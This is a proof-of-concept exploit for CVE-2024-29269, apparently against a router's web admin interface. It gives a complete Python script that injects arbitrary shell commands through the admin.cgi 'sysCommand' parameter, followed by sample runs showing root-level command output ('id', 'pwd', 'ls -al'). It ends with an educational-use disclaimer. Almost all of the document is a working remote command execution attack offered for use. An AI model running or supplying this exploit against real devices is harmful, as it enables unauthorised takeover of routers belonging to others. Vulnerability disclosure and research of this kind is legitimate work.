- CVE: CVE-2024-29269
- Severity: Critical
- Details/Reference: https://github.com/wutalent/CVE-2024-29269/blob/main/index.md (archive)
File: script.py
import sys
import requests
import xml.etree.ElementTree as ET
def get_systemutil_response(url, command, proxy):
endpoint = f"/cgi-bin/admin.cgi?Command=sysCommand&Cmd={command}"
full_url = url.rstrip('/') + endpoint
headers = {
'Referer': url,
}
try:
response = requests.get(full_url, headers=headers, proxies=proxy)
if response.status_code == 200:
print("Response from", full_url)
#print(response.text)
root = ET.fromstring(response.text)
for cmd_result in root.findall('CmdResult'):
data = cmd_result.text.strip()
print(data)
else:
print("Error: Failed to fetch data. Status code:", response.status_code)
except requests.exceptions.RequestException as e:
print("Error:", e)
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python script.py <url> <command>")
sys.exit(1)
url = sys.argv[1]
command = sys.argv[2]
proxy = {
'http': 'http://127.0.0.1:8080',
'https': 'https://127.0.0.1:8080',
}
get_systemutil_response(url, command, proxy)To run the script, use the following commands:
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py
Usage: python script.py <url> <command>
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ id
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
uid=0(admin) gid=0(admin)
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ pwd
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=pwd
/etc_ro/lighttpd/www/cgi-bin
bipin@bipin-VirtualBox:~/CVE-2024-29269$ python3 script.py http://ROUTER_IP:PORT/ "ls -al"
Response from http://ROUTER_IP:PORT/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls -al
-rwxrwxr-x 1 1000 1000 xxxxxx web
-rwxrwxr-x 1 1000 1000 xxxxx update.cgi
-rwxrwxr-x 1 1000 1000 xxxxx lte.cgi
-rwxrwxr-x 1 1000 1000 xxx ExportTrafficLog.sh
-rwxrwxr-x 1 1000 1000 xxxxx nms.cgi
-rwxrwxr-x 1 1000 1000 xxxxx admin.cgi
-rwxrwxr-x 1 1000 1000 xxxxx bip.cgi
-rwxrwxr-x 1 1000 1000 xxxxx systemutil.cgi
-rwxrwxr-x 1 1000 1000 xxxxx wireless.cgi
-rwxrwxr-x 1 1000 1000 xxx ExportvpnLog.sh
-rwxrwxr-x 1 1000 1000 xxxxx serialmodem.cgi
-rwxrwxr-x 1 1000 1000 xxxxx modem.cgi
-rwxrwxr-x 1 1000 1000 xxxxx traffic.cgi
-rwxrwxr-x 1 1000 1000 xxxxx firewall.cgi
-rwxrwxr-x 1 1000 1000 xxx ExportSettings.sh
-rwxrwxr-x 1 1000 1000 xxxxx serial.cgi
-rwxrwxr-x 1 1000 1000 xxxxx gmmp.cgi
-rwxrwxr-x 1 1000 1000 xxxxx internet.cgi
-rw-r--r-- 1 0 0 0 xx.txt`
-rw-r--r-- 1 0 0 xx xxyyzz.txt
-rwxrwxrwx 1 0 0 xxxxxxx linux-mips
drwxrwxr-x 21 1000 1000 0 ..
drwxrwxr-x 2 1000 1000 0 .
This code and associated instructions are provided for educational purposes only. Unauthorized use for malicious intent, including but not limited to unauthorized access to computer systems, networks, or data, is strictly prohibited. The author disclaims any responsibility for misuse of the code or any negative consequences resulting from its use. Users are advised to adhere to ethical and legal standards when utilizing or experimenting with the provided code. It is recommended to obtain explicit permission before attempting to run this code on any systems or networks that are not owned or managed by the user.